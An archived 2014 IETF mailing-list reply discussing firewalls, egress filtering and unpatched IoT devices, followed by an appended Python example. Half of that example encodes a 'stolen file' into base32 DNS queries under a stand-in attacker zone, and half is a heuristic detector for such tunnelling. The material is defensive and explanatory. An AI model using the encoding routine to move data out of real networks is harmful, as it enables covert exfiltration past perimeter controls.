ietf

Re: 64 bit firewalls

2014-07-03 13:10:05

Dear Fernando,
See comments inline:

On Jul 3, 2014, at 9:54 AM, Fernando Gont 
<fernando(_at_)gont(_dot_)com(_dot_)ar> wrote:

> On 07/03/2014 11:20 AM, Phillip Hallam-Baker wrote:
>> Yes firewalls do suck, but one of the reasons they suck a lot worse than
>> they need to is because there was a lot of resistance in the IETF to the
>> whole concept. And so any attempt to make IETF protocols firewall
>> friendly was often met with obstructionism.
>
> And maybe not much guidance to make firewalls protocol-friendly, so to
> speak?

This can also be considered the other way around as well.

[...]
>> Outbound traffic is relatively easy to deal with. All the firewall needs
>> to do is to decide whether the destination is one that isn't permitted.
>> And usually the right decision gets made - though there are many
>> enterprise firewalls locked down to only permit outbound port 80 and 443
>> and nothing else unless the packets come from a specially privileged
>> server. OK this is bad but at least the firewall logs tell us the extent
>> of the issue.
>
> Is it really bad from a security point of view? -- at the end of the
> day, it obeys the principle of "least privilege"....

Such restrictions do little to prevent data exfiltration.  Even DNS can be used
and is fairly difficult to block.

[....]

>> Note that this is moving beyond firewalls. Firewalls are a weak security
>> solution because they only provide policy enforcement at the perimeter.
>> In a defense in depth strategy we would want every device in the network
>> to perform policy enforcement and policy audit.
>
> The fact that you deploy a firewall at the perimeter doesn't mean you
> can or shouldn't e.g. deploy a host-based firewall.


Agreed, but not all devices permit such a strategy.  Take a fairly common 
all-in-one fax/scanner/printer/media-reader as an example.  It seems protecting 
network perimeters will become more difficult, although IPv6 technology is able 
to greatly improve upon this situation.

The following draft attempts to highlight some of the issues created by overly 
simplistic approaches.  One desire is to automatically place mDNS resources 
into a homenet automated DNS permitting globally routable sessions to be 
exchanged within a local network while at the same time expecting use of 
multiple prefixes.

Who would want to receive a bill for international faxes sent night after 
night?  Or having their Internet-Ready TV with video conferencing spy on them?  
Some of these devices will not receive timely updates, if ever.  Even obtaining 
source code may require owners to cover costs while still not repairing 
vulnerabilities.  In too many cases, establishing a solid perimeter remains 
essential and is likely to remain the case for many years into the future.

http://tools.ietf.org/html/draft-otis-dnssd-mdns-xlink-04

Regards,
Douglas Otis
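The exfiltration point made above (an egress policy that only permits outbound 80/443 still lets data leave over DNS, because the client only ever talks to the site's own resolver) as an added, self-contained example that is not part of the thread or of any draft it cites. It shows both sides: how a client chunks bytes into base32 query labels under an attacker-controlled zone, and a per-domain heuristic a defender can run over resolver query logs to spot that pattern. The zone name `exfil.example`, the log line layout `<epoch> <client-ip> <qname> <qtype>`, the sample log lines and the detection thresholds are all my assumptions and constructed data, not a real resolver's format or a tuned baseline.

```python
"""
Added example (not from the thread): an 80/443-only egress policy leaves DNS
as an exfiltration channel. chunk_to_qnames shows how bytes leave through the
site's own recursive resolver; dns_tunnel_suspects is a per-domain heuristic
over query logs. Log line format '<epoch> <client-ip> <qname> <qtype>' is an
assumption, and every line in SAMPLE_LOG is constructed.
"""
import base64
import math
import random
from collections import defaultdict

ATTACKER_ZONE = "exfil.example"  # hypothetical attacker-controlled zone


def chunk_to_qnames(data, zone, chunk=30):
    """Exfil side: split data into base32 labels under an attacker zone.
    Each name is looked up through the ordinary recursive resolver, so the
    perimeter sees only port 53 from the resolver, never a client on 80/443."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk)):
        label = base64.b32encode(data[off:off + chunk]).decode().rstrip("=").lower()
        names.append("%d.%s.%s" % (seq, label, zone))
    return names


def qnames_to_bytes(names):
    """Authoritative-server side: reassemble the payload from the query names."""
    parts = {}
    for name in names:
        seq, label = name.split(".")[:2]
        parts[int(seq)] = base64.b32decode(label.upper() + "=" * (-len(label) % 8))
    return b"".join(parts[i] for i in sorted(parts))


def shannon_entropy(s):
    """Bits per symbol; base32 payload labels sit near 4-5, hostnames near 2-3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    # Naive: last two labels. Production code should consult the public suffix list.
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def dns_tunnel_suspects(lines, min_queries=20, min_unique_ratio=0.9, min_entropy=3.5):
    """Flag domains whose subdomains are almost all unique and high-entropy.
    Thresholds are illustrative assumptions; tune them against your own baseline."""
    stats = defaultdict(lambda: {"q": 0, "unique": set(), "ent": 0.0, "maxlab": 0})
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        qname = fields[2].lower().rstrip(".")
        dom = registered_domain(qname)
        sub = qname[:-len(dom) - 1] if qname.endswith("." + dom) else ""
        st = stats[dom]
        st["q"] += 1
        st["unique"].add(sub)
        st["ent"] += shannon_entropy(sub.replace(".", ""))
        st["maxlab"] = max(st["maxlab"], max(len(l) for l in sub.split(".")))
    suspects = {}
    for dom, st in stats.items():
        if st["q"] < min_queries:
            continue
        ratio = len(st["unique"]) / st["q"]
        ent = st["ent"] / st["q"]
        if ratio >= min_unique_ratio and ent >= min_entropy:
            suspects[dom] = {"queries": st["q"], "unique_ratio": round(ratio, 2),
                             "mean_entropy": round(ent, 2), "max_label": st["maxlab"]}
    return suspects


# Constructed query log: ordinary lookups of a few hosts, plus a 900-byte
# "stolen file" leaving through the resolver as 30 TXT queries.
_rng = random.Random(1)
_payload = bytes(_rng.getrandbits(8) for _ in range(900))
SAMPLE_LOG = []
_t = 1404400000
for _ in range(10):
    for _host in ("www.example.com", "mail.example.com", "cdn.example.com", "example.com"):
        SAMPLE_LOG.append("%d 10.1.2.3 %s A" % (_t, _host))
        _t += 1
for _name in chunk_to_qnames(_payload, ATTACKER_ZONE):
    SAMPLE_LOG.append("%d 10.1.2.3 %s TXT" % (_t, _name))
    _t += 1

if __name__ == "__main__":
    for dom, info in dns_tunnel_suspects(SAMPLE_LOG).items():
        print("suspect:", dom, info)
```

The detector deliberately keys on the registered domain rather than on individual names, since a tunnel never repeats a query name; a uniqueness ratio near 1.0 combined with high-entropy labels is the signature, whereas ordinary hosts repeat and have low entropy. Blocking this at the perimeter would mean forcing all DNS through a resolver you log, since a client that can reach any port 53 directly bypasses the heuristic entirely.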